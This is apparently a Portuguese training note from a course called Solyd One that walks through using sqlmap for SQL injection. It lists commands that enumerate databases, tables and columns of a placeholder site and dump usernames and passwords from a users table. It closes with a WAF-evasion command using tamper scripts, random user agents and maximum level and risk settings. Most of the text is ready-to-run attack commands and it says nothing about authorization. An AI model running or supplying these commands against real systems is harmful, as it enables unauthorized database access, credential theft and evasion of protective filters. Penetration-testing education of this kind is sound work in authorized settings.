Sqlmap | Solyd One | Ataque específicos
- Sqlmap | Solyd One | Ataque específicos
🔍 Fluxo de Uso do sqlmap – De forma Visual + Comandos
[1] Identificar o alvo
│
▼
[2] Testar se é vulnerável a SQLi
│
▼
[3] Descobrir o SGBD (MySQL, MSSQL, etc.)
│
▼
[4] Listar os bancos de dados
│
▼
[5] Escolher e listar tabelas de um banco
│
▼
[6] Escolher e listar colunas de uma tabela
│
▼
[7] Extrair os dados das colunas
🔧 Etapas com comandos sqlmap
1. Identifique um ponto de injeção
Por exemplo: http://site.com/produto.php?id=1
2. Testar vulnerabilidade
sqlmap -u "http://site.com/produto.php?id=1" --batch --dbs
--batch: aceita opções padrão automaticamente (modo silencioso).--dbs: tenta listar os bancos de dados disponíveis.
3. Descobrir o banco de dados utilizado (DBMS)
sqlmap -u "http://site.com/produto.php?id=1" --batch --dbms
Ou será inferido automaticamente no primeiro comando.
4. Listar os bancos de dados
Se ainda não o fez:
sqlmap -u "http://site.com/produto.php?id=1" --batch --dbs
5. Listar as tabelas de um banco específico
sqlmap -u "http://site.com/produto.php?id=1" -D nome_do_banco --tables
6. Listar colunas de uma tabela específica
sqlmap -u "http://site.com/produto.php?id=1" -D nome_do_banco -T nome_da_tabela --columns
7. Extrair dados
sqlmap -u "http://site.com/produto.php?id=1" -D nome_do_banco -T nome_da_tabela -C coluna1,coluna2 --dump
🎯 Exemplo Prático
sqlmap -u "http://site.com/produto.php?id=1" --dbs --threads=10
# Digamos que retornou: ecommerce
sqlmap -u "http://site.com/produto.php?id=1" -D ecommerce --tables --threads=10
# Retorna: users, orders, products
sqlmap -u "http://site.com/produto.php?id=1" -D ecommerce -T users --columns --threads=10
# Retorna: id, username, password, email
sqlmap -u "http://site.com/produto.php?id=1" -D ecommerce -T users -C username,password --dump --threads=10
# Extrai os dados das colunas selecionadas
Exemplo para aplicações que possuem WAF
sqlmap -u "http://alvo.com/pagina.php?id=1" \
--random-agent \
--tamper=between,space2comment,charunicodeescape \
--technique=BEUSTQ \
--level=5 --risk=3 \
--threads=10 \
--batch